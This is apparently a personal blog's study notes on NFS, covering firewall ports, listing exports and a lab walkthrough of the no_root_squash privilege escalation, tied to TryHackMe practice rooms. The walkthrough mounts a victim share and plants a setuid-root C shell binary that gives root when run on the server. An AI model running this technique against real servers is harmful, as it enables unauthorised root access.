Skip to main content

NFS: Notes

NFS - Source: https://www.mayagraphics.gr/images/upload/Works122-lo20-8587413302009850261-s1.jpg

NFS - Network File System

To allow NFS traffic throught a firewall these ports need to be open:

  • NFS Daemon (NFSD): Runs on NFS servers and uses port 2049 for both TCP and UDP
  • Portmapper: Uses port 111 for both TCP and UDP
  • Mount daemon (mountd): Uses port 20048, which is specified in /etc/services

Show mounts on remote NFS server

# showmount -e 10.10.177.215
Export list for 10.10.177.215:
/opt/conf *
#

NFS exploit

Example of no_root_squash

[paradox@localhost tmp]$ cat /etc/exports
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
[paradox@localhost tmp]$

Yet another example of no_root_squash

john@enterprize:~$ cat /etc/exports
cat /etc/exports
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
john@enterprize:~$

On attack machine

# mkdir /tmp/nfs

# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs
mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

First mount failed

# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
#

# apt install nfs-common
# service rpcbind restart
# service statd start

# mount -o rw,vers=2 localhost:/home/james /tmp/nfs
mount.nfs: requested NFS version or transport protocol is not supported

apt install nfs-common nfs4-acl-tools

root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs
mount.nfs: Protocol not supported
root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs
root@T420:/tmp/nfs# ls /tmp/nfs
credentials.bak
root@T420:/tmp/nfs#

# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x

On NFS server (victim) machine

$ /tmp/x
#

References

NFS no_root_squash/no_all_squash misconfiguration PE

Network File System on Wikepedia

Practice

>>> THM | Network Services 2

>>> THM | Linux PrivEsc - Task 19 - NFS

>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing

>>> THM | Overpass 3 - Hosting

>>> THM | Enterprize

>>> THM | VulnNet: Internal

Labels:

Popular posts from this blog

Qubes OS: Fedora 30

Create a new Standalone VM based on fedora-29 VM template Extend root partition: run command on dom0 tuyen@dom0:~ $ qvm-volume extend fedora-30:root 12288MB Set qrexec_timeout to 600 seconds tuyen@dom0:~ $ qvm-pref --set fedora-30 qrexec_timeout 600 $ sudo dnf upgrade --refresh $ sudo dnf install dnf-plugin-sytem-upgrade $ sudo dnf system-upgrade download --release=30 Install fedora-30 template Run the following command on dom0 terminal $ sudo qubes-dom0-update qubes-template-fedora-30 Install Adobe Flash Player Adobe Flash Player will not go away soon. So, let's grab the latest version of Adobe Flash Player , then install using yum or dnf command. Verify if Adobe Flash Player is installed and works by visiting https://helpx.adobe.com/flash-player.html [user@fedora-30 ~]$ sudo dnf install Downloads/flash-player-npapi-32.0.0.238-release.x86_64.rpm Last metadata expiration check: 0:37:03 ago on Fri Aug 30 09:18:10 2019. Dependencies resolved. =========...
Read more

How to charge your device from USB Port

First of all, check BIOS Settings of your laptop or desktop Dell Look for USB PowerShare BIOS Settings: USB PowerShare Lenovo Look for Always On USB Charge in Off Mode BIOS Settings: Enable Always On USB Charge in Off Mode
Read more

Python: Free Online Courses

Ever thinking about which programming language to learn first? You can learn Python for free with these online courses.
Read more